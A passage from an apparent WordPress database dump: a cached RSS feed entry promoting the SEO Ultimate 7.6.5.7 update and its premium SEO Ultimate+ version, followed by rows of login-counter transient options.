class=\"col-md-12\">\n<div class=\" text-center\" style=\"margin-top:35px;margin-bottom:35px;\"><iframe style=\"height: 313px;\" src=\"//fast.wistia.net/embed/iframe/hocfwbb6rd?videoFoam=true\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" class=\"wistia_embed\" name=\"wistia_embed\" allowfullscreen=\"\" mozallowfullscreen=\"\" webkitallowfullscreen=\"\" oallowfullscreen=\"\" msallowfullscreen=\"\" width=\"650\" height=\"311\"></iframe><script src=\"//fast.wistia.net/assets/external/E-v1.js\"></script></div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>But, if you haven’t already, let us know what you think by clicking here and <a href=\"https://wordpress.org/support/view/plugin-reviews/seo-ultimate\" data-mce-href=\"https://wordpress.org/support/view/plugin-reviews/seo-ultimate\">leaving us a review on WordPress</a> ;) or you can show your support by purchasing <a href=\"https://www.seoultimateplus.com/product/seo-ultimate-plus/\" data-mce-href=\"https://www.seoultimateplus.com/product/seo-ultimate-plus/\">SEO Ultimate+</a> for its powerful new features, training and support.</p>\n<p>If you&#8217;re looking&nbsp; to build a new site, make sure to try SEO Ultimate&#8217;s companion product the <a href=\"http://www.seodesignframework.com\" data-mce-href=\"http://www.seodesignframework.com\">SEO Design Framework</a>. </p>\n<p>Thanks for stopping in&#8230; since we can&#8217;t read it, let us know what&#8217;s on your mind. </p>\n<p>Leave a comment below or share this post socially to get the word out about <em><strong>our soft launch for SEO Ultimate+ </strong></em>(up, up and away).</p>\n<p>We look forward to hearing from you or you can be stealthy and just <a href=\"https://twitter.com/@jeffrey_smith\" data-mce-href=\"https://twitter.com/@jeffrey_smith\">follow me on twitter</a> instead.</p>\n<p>All the best!</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=CLbuMSbKLvM:2zGIgKikAM0:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/CLbuMSbKLvM\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:515:\"We&#8217;re feeling SUPER (no tens inpunded&#8230;) and just wanted to give you all a quick heads up that there&#8217;s a new version of SEO Ultimate Version 7.6.5.7 available for download from the WordPress repository or via your WordPress plugin dashboard. The video above covers the free update, however, to see the premium version, keep scrolling <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/new-update-plus-seo-ultimate-is-going-premium-up-up-and-away/\" class=\"read-more-excerpt\">Read More</a>\";s:3:\"wfw\";a:1:{s:10:\"commentrss\";s:119:\"http://www.seodesignsolutions.com/blog/wordpress-seo/new-update-plus-seo-ultimate-is-going-premium-up-up-and-away/feed/\";}s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"3\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:114:\"http://www.seodesignsolutions.com/blog/wordpress-seo/new-update-plus-seo-ultimate-is-going-premium-up-up-and-away/\";}s:7:\"summary\";s:515:\"We&#8217;re feeling SUPER (no tens inpunded&#8230;) and just wanted to give you all a quick heads up that there&#8217;s a new version of SEO Ultimate Version 7.6.5.7 available for download from the WordPress repository or via your WordPress plugin dashboard. The video above covers the free update, however, to see the premium version, keep scrolling <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/new-update-plus-seo-ultimate-is-going-premium-up-up-and-away/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:10438:\"<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">We&#8217;re feeling SUPER (no tens inpunded&#8230;) and just wanted to give you all a quick <strong>heads up</strong> that there&#8217;s a new version of <strong><a href=\"http://www.seodesignsolutions.com\">SEO</a> Ultimate Version 7.6.5.7</strong> available for download from the <a href=\"https://wordpress.org/plugins/seo-ultimate/\">WordPress repository</a> or via your WordPress plugin dashboard.</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-center\"><iframe style=\"height: 400px;\" src=\"//fast.wistia.net/embed/iframe/qd5yjgfos1?videoFoam=true\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" class=\"wistia_embed\" name=\"wistia_embed\" allowfullscreen=\"\" mozallowfullscreen=\"\" webkitallowfullscreen=\"\" oallowfullscreen=\"\" msallowfullscreen=\"\" width=\"700\" height=\"398\"></iframe><script src=\"//fast.wistia.net/assets/external/E-v1.js\"></script></div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\">The video above covers the free update, however, to see the premium version, keep scrolling ;)</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>As the numeric code implies (since it&#8217;s only incremental) that even though there were some <em>minor bug fixes</em>, this was mostly a cosmetic update to the plugin. </p>\n<p>You&#8217;ll find a few new resources and tools available for you in the SEO Admin Bar <strong>that we cover in the video above</strong>. Also, we&#8217;ve also covered some of the new tools that are accessible from the SEO admin bar. </p>\n<p></p>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-left\">\n<h1>SEO Ultimate Goes Premium!</h1>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>Granted, truth be told, the real heavy lifting from this point on is going into <strong>the premium version of the plugin</strong> called <a href=\"https://www.seoultimateplus.com\" data-mce-href=\"https://www.seoultimateplus.com\">SEO Ultimate+</a>. We&#8217;re not going to pull any features, but all new ones move to +.</p>\n<p>For example, there&#8217;s over 7 months of coding time on one module to rewrite the base code of the Open Graph Integrator which has now shifted into its next embodiment&#8230;. (<em>like a caterpillar to a butterfly</em>) the <strong>OpenGraph+ Module</strong> which you can <a href=\"https://www.seoultimateplus.com/screencaps/\" data-mce-href=\"https://www.seoultimateplus.com/screencaps/\">see here</a>, with features like &#8230;</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:10px;\"><strong>Enjoy Simple, Easy-to-Implement Twitter Cards!</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/twitter-summary-card.jpg\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"Create All 7 Twitter Cards with SEO Ultimate+\"></div>\n</figure>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\" style=\"margin-top:5px;\">\n<p>Now You Can Make Twitter Cards (all 7 types) with Ease! With No Fuss and No Mess!</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\" style=\"padding-top:5px;\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:25px;\"><strong>More Powerful Page Level Settings</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\" style=\"margin-top:20px;margin-bottom:20px;\">\n<p>The premium version <strong><a href=\"https://www.seoultimateplus.com\" data-mce-href=\"https://www.seoultimateplus.com\">SEO Ultimate+</a></strong> handles Google+ customization, <strong>Open Graph / Facebook</strong> integration (on a page-by-page, post-by-post or mass edits 100 pages at a time).</p>\n<p>You can create all 7 types of Twitter cards&#8230;<strong>like a BOSS </strong>(<em>that validate flawlessly</em>) as well as there&#8217;s a powerful new arsenal of <strong>rich snippets </strong>to shoot up the SERPs ranging from <strong>Local SEO (Business), Events, Organization, People, Products, Recipes, Reviews, Software</strong> and <strong>Video</strong> (with more to come).</p>\n</div>\n</div>\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/Local-Page-Rich-Snippets.png\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"SEO Ultimate Page Level Rich Snippets\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/Local-Page-Rich-Snippets.png\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\" style=\"margin-top:20px;margin-bottom:20px;\">\n<p>There’s even a global fallback in SEO Ultimate+ in case you forget to add custom OG data at the page level where you can assign entire post types to as rules to a specific Open Graph type or specific type of Twitter Cards (<a href=\"https://dev.twitter.com/cards/types\" data-mce-href=\"https://dev.twitter.com/cards/types\">all 7 twitter cards</a> are available and validate).</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:25px;\"><strong>Global Post Type Customization for Open Graph and Twitter Cards.</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/7-Twitter-Card-Types-1200x622.png\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"Create Valid Twitter Cards with Ease\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/7-Twitter-Card-Types-1200x622.png\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row last_row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:25px;\"><strong>The New (Premium) OpenGraph+ Module and 7 New Rich Snippets</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>You can also mass edit pages and posts (up to 100 entries at a time and customize unique titles, meta descriptions, Open Graph, Google+, FB and Twitter inputs).</p>\n<p>Now that’s something you can’t do with the FREE version of SEO Ultimate…since it only has rich-snippets for <em>place</em> and <em>review</em> ;( and sorry guys <strong>no new features on the free version from now on</strong>, only bug fixes as all new feature development is moving exclusively the premium version SEO Ultimate+.</p>\n<p>In any case, this is only the beginning and we’ll be adding new features to SEO Ultimate plus, but don’t worry, there’s still plenty of horsepower in the free version (which you can get <a href=\"https://seodesignframework.leadpages.net/seo-ultimate-video-training/\" data-mce-href=\"https://seodesignframework.leadpages.net/seo-ultimate-video-training/\">FREE video training</a> for here). Before we leave, we&#8217;ll let you play the quick and dirty version of the OpenGraph+ Module video.</p>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\" style=\"margin-top:35px;margin-bottom:35px;\"><iframe style=\"height: 313px;\" src=\"//fast.wistia.net/embed/iframe/hocfwbb6rd?videoFoam=true\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" class=\"wistia_embed\" name=\"wistia_embed\" allowfullscreen=\"\" mozallowfullscreen=\"\" webkitallowfullscreen=\"\" oallowfullscreen=\"\" msallowfullscreen=\"\" width=\"650\" height=\"311\"></iframe><script src=\"//fast.wistia.net/assets/external/E-v1.js\"></script></div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>But, if you haven’t already, let us know what you think by clicking here and <a href=\"https://wordpress.org/support/view/plugin-reviews/seo-ultimate\" data-mce-href=\"https://wordpress.org/support/view/plugin-reviews/seo-ultimate\">leaving us a review on WordPress</a> ;) or you can show your support by purchasing <a href=\"https://www.seoultimateplus.com/product/seo-ultimate-plus/\" data-mce-href=\"https://www.seoultimateplus.com/product/seo-ultimate-plus/\">SEO Ultimate+</a> for its powerful new features, training and support.</p>\n<p>If you&#8217;re looking&nbsp; to build a new site, make sure to try SEO Ultimate&#8217;s companion product the <a href=\"http://www.seodesignframework.com\" data-mce-href=\"http://www.seodesignframework.com\">SEO Design Framework</a>. </p>\n<p>Thanks for stopping in&#8230; since we can&#8217;t read it, let us know what&#8217;s on your mind. </p>\n<p>Leave a comment below or share this post socially to get the word out about <em><strong>our soft launch for SEO Ultimate+ </strong></em>(up, up and away).</p>\n<p>We look forward to hearing from you or you can be stealthy and just <a href=\"https://twitter.com/@jeffrey_smith\" data-mce-href=\"https://twitter.com/@jeffrey_smith\">follow me on twitter</a> instead.</p>\n<p>All the best!</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=CLbuMSbKLvM:2zGIgKikAM0:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/CLbuMSbKLvM\" height=\"1\" width=\"1\" alt=\"\"/>\";}}s:7:\"channel\";a:9:{s:5:\"title\";s:28:\"SEO Design Solutions™ Blog\";s:4:\"link\";s:38:\"http://www.seodesignsolutions.com/blog\";s:11:\"description\";s:94:\"Search Engine Optimization Strategies, Tips, Tactics and Techniques from SEO Design Solutions.\";s:8:\"language\";s:5:\"en-US\";s:13:\"lastbuilddate\";s:29:\"Mon, 17 Dec 2018 13:26:00 PST\";s:9:\"generator\";s:31:\"https://wordpress.org/?v=4.9.10\";s:2:\"sy\";a:2:{s:12:\"updateperiod\";s:6:\"hourly\";s:15:\"updatefrequency\";s:1:\"1\";}s:10:\"feedburner\";a:3:{s:14:\"emailserviceid\";s:22:\"SeoDesignSolutionsBlog\";s:18:\"feedburnerhostname\";s:29:\"https://feedburner.google.com\";s:9:\"feedflare\";s:391:\"Subscribe with My Yahoo!Subscribe with BloglinesSubscribe with NetvibesSubscribe with Bitty BrowserSubscribe with Daily RotationSubscribe with My AOLSubscribe with WikioSubscribe with PageflakesSubscribe with Excite MIXSubscribe with GoogleSubscribe with The Free DictionarySubscribe with Podcast ReadySubscribe with NewsGatorSubscribe with WebwagSubscribe with Live.comSubscribe with Plusmo\";}s:7:\"tagline\";s:94:\"Search Engine Optimization Strategies, Tips, Tactics and Techniques from SEO Design Solutions.\";}s:9:\"textinput\";a:0:{}s:5:\"image\";a:0:{}s:9:\"feed_type\";s:3:\"RSS\";s:12:\"feed_version\";s:3:\"2.0\";s:5:\"stack\";a:0:{}s:9:\"inchannel\";b:0;s:6:\"initem\";b:0;s:9:\"incontent\";b:0;s:11:\"intextinput\";b:0;s:7:\"inimage\";b:0;s:13:\"current_field\";s:0:\"\";s:17:\"current_namespace\";b:0;s:19:\"_CONTENT_CONSTRUCTS\";a:6:{i:0;s:7:\"content\";i:1;s:7:\"summary\";i:2;s:4:\"info\";i:3;s:5:\"title\";i:4;s:7:\"tagline\";i:5;s:9:\"copyright\";}s:4:\"etag\";s:27:\"IUAJwnCC/ZcLUx+0VPBYEqjSOpU\";s:13:\"last_modified\";s:29:\"Mon, 26 Aug 2019 15:36:16 GMT\";}', 'no');
INSERT INTO `www2_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(116336, '_transient_timeout_wflginfl_657483828', '1497658075', 'no'),
(116310, '_transient_timeout_wflginfl_3065501688', '1497647438', 'no'),
(116311, '_transient_wflginfl_3065501688', '2', 'no'),
(116312, '_transient_timeout_wflginfl_1333917890', '1497648630', 'no'),
(116313, '_transient_wflginfl_1333917890', '2', 'no'),
(116320, '_transient_timeout_wflginfl_1562720498', '1497651153', 'no'),
(116321, '_transient_wflginfl_1562720498', '2', 'no'),
(116331, '_transient_timeout_wflginfl_3132885100', '1497654448', 'no'),
(116325, '_transient_wflginfl_778264191', '2', 'no'),
(116324, '_transient_timeout_wflginfl_778264191', '1497651509', 'no'),
(116332, '_transient_wflginfl_3132885100', '2', 'no'),
(116337, '_transient_wflginfl_657483828', '2', 'no'),
(116338, '_transient_timeout_wflginfl_1391023253', '1497658465', 'no'),
(116339, '_transient_wflginfl_1391023253', '2', 'no'),
(116340, '_transient_timeout_wflginfl_3373557666', '1497658735', 'no'),
(116341, '_transient_wflginfl_3373557666', '2', 'no'),
(116343, '_transient_timeout_wflginfl_1568068015', '1497661341', 'no'),
(116344, '_transient_wflginfl_1568068015', '2', 'no'),
(116345, '_transient_timeout_wflginfl_1976107644', '1497662140', 'no'),
(116346, '_transient_wflginfl_1976107644', '2', 'no'),
(116347, '_transient_timeout_wflginfl_1892747498', '1497662865', 'no'),
(116348, '_transient_wflginfl_1892747498', '1', 'no'),
(116352, '_transient_timeout_wflginfl_1539318777', '1497665490', 'no'),
(116353, '_transient_wflginfl_1539318777', '2', 'no'),
(116354, '_transient_timeout_wflginfl_1742915821', '1497665720', 'no'),
(116355, '_transient_wflginfl_1742915821', '2', 'no'),
(116361, '_transient_timeout_wflginfl_2390016979', '1497668683', 'no'),
(116362, '_transient_wflginfl_2390016979', '2', 'no'),
(116364, '_transient_timeout_wflginfl_1439252880', '1497670660', 'no'),
(116365, '_transient_wflginfl_1439252880', '1', 'no'),
(120856, '_transient_timeout_wflginfl_3399919026', '1500143801', 'no'),
(120857, '_transient_wflginfl_3399919026', '2', 'no'),
(116368, '_transient_timeout_wflginfl_1517874559', '1497671096', 'no'),
(116369, '_transient_wflginfl_1517874559', '1', 'no'),
(116370, '_transient_timeout_wflginfl_3372672787', '1497672904', 'no'),
(116371, '_transient_wflginfl_3372672787', '2', 'no'),
(116372, '_transient_timeout_wflginfl_694709661', '1497673907', 'no'),
(116373, '_transient_wflginfl_694709661', '2', 'no'),
(116378, '_transient_wflginfl_3032436716', '1', 'no'),
(116379, '_transient_timeout_wflginfl_3358968011', '1497677326', 'no'),
(116380, '_transient_wflginfl_3358968011', '2', 'no'),
(116381, '_transient_timeout_wflginfl_3532827868', '1497677512', 'no'),
(116382, '_transient_wflginfl_3532827868', '1', 'no'),
(116383, '_transient_timeout_wflginfl_3305257452', '1497677544', 'no'),
(116384, '_transient_wflginfl_3305257452', '2', 'no'),
(116388, '_transient_timeout_wflginfl_995899164', '1497678478', 'no'),
(116389, '_transient_wflginfl_995899164', '2', 'no'),
(116393, '_transient_timeout_wflginfl_3319654464', '1497684487', 'no'),
(116394, '_transient_wflginfl_3319654464', '2', 'no'),
(116395, '_transient_timeout_wflginfl_3000776981', '1497684752', 'no'),
(116396, '_transient_wflginfl_3000776981', '2', 'no'),
(116401, '_transient_timeout_wflginfl_831611257', '1497689793', 'no'),
(116402, '_transient_wflginfl_831611257', '2', 'no'),
(116403, '_transient_timeout_wflginfl_1442374564', '1497691519', 'no'),
(116404, '_transient_wflginfl_1442374564', '1', 'no'),
(116406, '_transient_timeout_wflginfl_2875375532', '1497692135', 'no'),
(116407, '_transient_wflginfl_2875375532', '1', 'no'),
(116419, '_transient_timeout_wflginfl_3070050096', '1497696173', 'no'),
(116411, '_transient_timeout_wflginfl_699849360', '1497694621', 'no'),
(116412, '_transient_wflginfl_699849360', '2', 'no'),
(116421, '_transient_timeout_wflginfl_2083059268', '1497696293', 'no'),
(116422, '_transient_wflginfl_2083059268', '2', 'no'),
(116420, '_transient_wflginfl_3070050096', '2', 'no'),
(116423, '_transient_timeout_wflginfl_1742476650', '1497698446', 'no'),
(116424, '_transient_wflginfl_1742476650', '2', 'no'),
(116426, '_transient_timeout_wflginfl_3154288046', '1497699257', 'no'),
(116427, '_transient_wflginfl_3154288046', '1', 'no'),
(116428, '_transient_timeout_wflginfl_3585148073', '1497699500', 'no'),
(116429, '_transient_wflginfl_3585148073', '2', 'no'),
(116430, '_transient_timeout_wflginfl_1507333940', '1497699839', 'no'),
(116431, '_transient_wflginfl_1507333940', '2', 'no'),
(116432, '_transient_timeout_wflginfl_657627066', '1497700247', 'no'),
(116433, '_transient_wflginfl_657627066', '1', 'no'),
(116434, '_transient_timeout_wflginfl_3291887407', '1497701046', 'no'),
(116435, '_transient_wflginfl_3291887407', '1', 'no'),
(116439, '_transient_timeout_wflginfl_418884769', '1497702993', 'no'),
(116440, '_transient_wflginfl_418884769', '1', 'no'),
(116441, '_transient_timeout_wflginfl_2945257711', '1497704113', 'no'),
(116442, '_transient_wflginfl_2945257711', '2', 'no'),
(116446, '_transient_timeout_wflginfl_1581440851', '1497707204', 'no'),
(116447, '_transient_wflginfl_1581440851', '2', 'no'),
(116448, '_transient_timeout_wflginfl_1979195372', '1497707210', 'no'),
(116449, '_transient_wflginfl_1979195372', '2', 'no'),
(116450, '_transient_timeout_wflginfl_460953403', '1497707420', 'no'),
(116451, '_transient_wflginfl_460953403', '2', 'no'),
(116455, '_transient_timeout_wflginfl_1733447443', '1497711312', 'no'),
(116456, '_transient_wflginfl_1733447443', '2', 'no'),
(116458, '_transient_timeout_wflginfl_248125723', '1497715793', 'no'),
(116459, '_transient_wflginfl_248125723', '2', 'no'),
(116463, '_transient_timeout_wflginfl_1521628389', '1497717217', 'no'),
(116464, '_transient_wflginfl_1521628389', '1', 'no'),
(116515, '_transient_timeout_wflginfl_3125698943', '1497755158', 'no'),
(116469, '_transient_wflginfl_3115319218', '1', 'no'),
(116466, '_transient_timeout_wflginfl_3320035317', '1497721285', 'no'),
(116467, '_transient_wflginfl_3320035317', '2', 'no'),
(116468, '_transient_timeout_wflginfl_3115319218', '1497721931', 'no'),
(116470, '_transient_timeout_wflginfl_995647581', '1497722656', 'no'),
(116471, '_transient_wflginfl_995647581', '2', 'no'),
(116475, '_transient_timeout_wflginfl_1330836365', '1497725424', 'no'),
(116476, '_transient_wflginfl_1330836365', '2', 'no'),
(116477, '_transient_timeout_wflginfl_1816379950', '1497727387', 'no'),
(116478, '_transient_wflginfl_1816379950', '2', 'no'),
(116483, '_transient_timeout_wflginfl_1411143507', '1497732117', 'no'),
(116484, '_transient_wflginfl_1411143507', '2', 'no'),
(116485, '_transient_timeout_wflginfl_995870782', '1497732727', 'no'),
(116486, '_transient_wflginfl_995870782', '1', 'no'),
(116814, '_transient_timeout_wflginfl_2959119668', '1497910051', 'no'),
(116815, '_transient_wflginfl_2959119668', '2', 'no'),
(116492, '_transient_timeout_wflginfl_2441280661', '1497736876', 'no'),
(116493, '_transient_wflginfl_2441280661', '2', 'no'),
(116503, '_transient_timeout_wflginfl_2588094137', '1497740685', 'no'),
(116497, '_transient_timeout_wflginfl_2975005806', '1497738337', 'no'),
(116498, '_transient_wflginfl_2975005806', '1', 'no'),
(116504, '_transient_wflginfl_2588094137', '2', 'no'),
(116516, '_transient_wflginfl_3125698943', '2', 'no'),
(116517, '_transient_timeout_wflginfl_3142950530', '1497755433', 'no'),
(116518, '_transient_wflginfl_3142950530', '2', 'no'),
(116593, '_transient_timeout_wflginfl_3109115678', '1497801252', 'no'),
(116522, '_transient_timeout_wflginfl_3141232515', '1497758736', 'no'),
(116523, '_transient_wflginfl_3141232515', '2', 'no'),
(116524, '_transient_timeout_wflginfl_1516638931', '1497759622', 'no'),
(116525, '_transient_wflginfl_1516638931', '1', 'no'),
(116526, '_transient_timeout_wflginfl_693261352', '1497759732', 'no'),
(116527, '_transient_wflginfl_693261352', '2', 'no'),
(116531, '_transient_timeout_wflginfl_1591283272', '1497763172', 'no'),
(116532, '_transient_wflginfl_1591283272', '2', 'no'),
(116536, '_transient_timeout_wflginfl_1298547324', '1497768928', 'no'),
(116537, '_transient_wflginfl_1298547324', '2', 'no'),
(116541, '_transient_timeout_wflginfl_29000538', '1497773421', 'no'),
(116542, '_transient_wflginfl_29000538', '2', 'no'),
(116544, '_transient_timeout_wflginfl_1600620828', '1497775396', 'no'),
(116545, '_transient_wflginfl_1600620828', '2', 'no'),
(116546, '_transient_timeout_wflginfl_1234445276', '1497776674', 'no'),
(116547, '_transient_wflginfl_1234445276', '2', 'no'),
(116548, '_transient_timeout_wflginfl_697210739', '1497776704', 'no'),
(116549, '_transient_wflginfl_697210739', '2', 'no'),
(119672, '_transient_timeout_wflginfl_1705472359', '1499534737', 'no'),
(119673, '_transient_wflginfl_1705472359', '2', 'no'),
(116562, '_transient_timeout_wflginfl_1890377347', '1497783381', 'no'),
(116555, '_transient_timeout_wflginfl_704366584', '1497782813', 'no'),
(116556, '_transient_wflginfl_704366584', '1', 'no'),
(116563, '_transient_wflginfl_1890377347', '2', 'no'),
(116564, '_transient_timeout_wflginfl_1539529701', '1497784423', 'no'),
(116565, '_transient_wflginfl_1539529701', '2', 'no'),
(116567, '_transient_timeout_wflginfl_1979473355', '1497785936', 'no'),
(116568, '_transient_wflginfl_1979473355', '2', 'no'),
(116572, '_transient_timeout_wflginfl_1892043087', '1497790206', 'no'),
(116573, '_transient_wflginfl_1892043087', '1', 'no'),
(116574, '_transient_timeout_wflginfl_247518067', '1497791948', 'no'),
(116575, '_transient_wflginfl_247518067', '2', 'no'),
(116576, '_transient_timeout_wflginfl_762606085', '1497792160', 'no'),
(116577, '_transient_wflginfl_762606085', '2', 'no'),
(116578, '_transient_timeout_wflginfl_1742943281', '1497792242', 'no'),
(116579, '_transient_wflginfl_1742943281', '2', 'no'),
(116581, '_transient_timeout_wflginfl_3318955358', '1497796302', 'no'),
(116582, '_transient_wflginfl_3318955358', '1', 'no'),
(116586, '_transient_timeout_wflginfl_3698057776', '1497796892', 'no'),
(116587, '_transient_wflginfl_3698057776', '2', 'no'),
(116588, '_transient_timeout_wflginfl_2982286323', '1497797596', 'no'),
(116589, '_transient_wflginfl_2982286323', '2', 'no'),
(116594, '_transient_wflginfl_3109115678', '2', 'no'),
(116595, '_transient_timeout_wflginfl_1920809324', '1497801853', 'no'),
(116596, '_transient_wflginfl_1920809324', '2', 'no'),
(116597, '_transient_timeout_wflginfl_2523639257', '1497802002', 'no'),
(116598, '_transient_wflginfl_2523639257', '2', 'no'),
(116600, '_transient_timeout_wflginfl_3583324965', '1497804146', 'no'),
(116601, '_transient_wflginfl_3583324965', '1', 'no'),
(116602, '_transient_timeout_wflginfl_2979849631', '1497806473', 'no'),
(116603, '_transient_wflginfl_2979849631', '1', 'no'),
(116607, '_transient_timeout_wflginfl_657671819', '1497807362', 'no'),
(116608, '_transient_wflginfl_657671819', '2', 'no'),
(116611, '_transient_timeout_wflginfl_3680280345', '1497807566', 'no'),
(116612, '_transient_wflginfl_3680280345', '2', 'no'),
(116613, '_transient_timeout_wflginfl_1293700813', '1497810207', 'no'),
(116614, '_transient_wflginfl_1293700813', '1', 'no'),
(116616, '_transient_timeout_wflginfl_2997788116', '1497811938', 'no'),
(116617, '_transient_wflginfl_2997788116', '2', 'no'),
(116618, '_transient_timeout_wflginfl_2945382205', '1497812849', 'no'),
(116619, '_transient_wflginfl_2945382205', '2', 'no'),
(116620, '_transient_timeout_wflginfl_850344114', '1497813846', 'no'),
(116621, '_transient_wflginfl_850344114', '2', 'no'),
(116639, '_transient_wflginfl_1733213953', '2', 'no'),
(116625, '_transient_timeout_wflginfl_702586352', '1497816062', 'no'),
(116626, '_transient_wflginfl_702586352', '2', 'no'),
(116627, '_transient_timeout_wflginfl_2090188641', '1497816080', 'no'),
(116628, '_transient_wflginfl_2090188641', '2', 'no'),
(116629, '_transient_timeout_wflginfl_1569717432', '1497816193', 'no'),
(116630, '_transient_wflginfl_1569717432', '2', 'no'),
(116631, '_transient_timeout_wflginfl_3386038149', '1497816597', 'no'),
(116632, '_transient_wflginfl_3386038149', '2', 'no'),
(116636, '_transient_timeout_wflginfl_1135341868', '1497818601', 'no'),
(116637, '_transient_wflginfl_1135341868', '2', 'no'),
(116638, '_transient_timeout_wflginfl_1733213953', '1497821318', 'no'),
(116643, '_transient_timeout_wflginfl_3250631515', '1497822925', 'no'),
(116644, '_transient_wflginfl_3250631515', '2', 'no'),
(116654, '_transient_timeout_wflginfl_608746987', '1497826098', 'no'),
(116648, '_transient_timeout_wflginfl_2872932610', '1497824504', 'no'),
(116649, '_transient_wflginfl_2872932610', '2', 'no'),
(116655, '_transient_wflginfl_608746987', '2', 'no'),
(116659, '_transient_timeout_wflginfl_1124568033', '1497829467', 'no'),
(116660, '_transient_wflginfl_1124568033', '2', 'no'),
(116661, '_transient_timeout_wflginfl_1377999865', '1497831168', 'no'),
(116662, '_transient_wflginfl_1377999865', '2', 'no'),
(116667, '_transient_timeout_wflginfl_703027240', '1497836053', 'no'),
(116668, '_transient_wflginfl_703027240', '1', 'no'),
(116669, '_transient_timeout_wflginfl_1935748769', '1497836231', 'no'),
(116670, '_transient_wflginfl_1935748769', '1', 'no'),
(116671, '_transient_timeout_wflginfl_1700951514', '1497839449', 'no'),
(116672, '_transient_wflginfl_1700951514', '1', 'no'),
(116676, '_transient_timeout_wflginfl_1336721696', '1497840000', 'no'),
(116677, '_transient_wflginfl_1336721696', '1', 'no'),
(116678, '_transient_timeout_wflginfl_1473158061', '1497840970', 'no'),
(116679, '_transient_wflginfl_1473158061', '2', 'no'),
(116680, '_transient_timeout_wflginfl_2955645869', '1497841543', 'no'),
(116681, '_transient_wflginfl_2955645869', '2', 'no'),
(116682, '_transient_timeout_wflginfl_1279333773', '1497842635', 'no'),
